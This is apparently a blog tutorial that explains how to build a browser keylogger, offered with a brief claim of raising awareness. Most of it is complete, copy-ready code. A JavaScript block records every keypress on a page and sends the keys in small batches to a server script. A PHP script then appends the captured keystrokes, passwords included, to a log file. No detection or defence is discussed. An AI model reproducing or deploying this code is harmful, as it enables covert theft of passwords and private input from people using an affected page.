AJAX Key Logger

I'm pretty sure you know those programs which are logging your action on the keyboard. They simply notice each key you press and save it to a file. These programs can notice your email adress, web pages you visit, your chat with friends and even your passwords. And what's worse, you don't know about them.

But what I want to write about. You should know that it's also possible to make such a keylogger in javascript. It notices only your action on the current page but still it can be misused. Just for example, imagine that you are trying to login somewhere and you are requested to enter a password. Are you 100% sure while entering the password or do you have to try some passwords because you can't recall the correct one?

You can create a keylogger very simple, I want you to be aware that something like this exists. Don't misuse this tutorial.

1) Create a file and call it index.html. Copy this into it and save it.

<script>
function sendkeylog (keylog) {
if (window.ActiveXObject) {
httpRequest = new ActiveXObject("Microsoft.XMLHTTP");
}
else {
httpRequest = new XMLHttpRequest();
}
httpRequest.open("GET", "server.php?keylog="+keylog, true);
httpRequest.send(null);
}

function savekeycode (e) {
keylog+=String.fromCharCode(e.charCode);
if ((keylog.length==5)||(e.keyCode==13)) {
sendkeylog(keylog);
keylog="";
}
}
keylog="";
document.onkeypress=savekeycode;
</script>

How does it work? The javacript notices every key press and saves it into a variable called keylog. When the keylog variable reaches the lenght of 5 letters, it's sent to a server by an ajax request.

2) Create a file and name it server.php. Copy this code and save it.

<?php
$myFile = "log.txt";
$fh = fopen($myFile, 'a+') or die("can't open file");
$stringData = $_GET["keylog"];
fwrite($fh, $stringData);
fclose($fh);
?>

The file on a server catchs the variable keylog (delivered by the ajax request) and saves it into a file called log.txt. The file log.txt should have a persmission to be rewritten.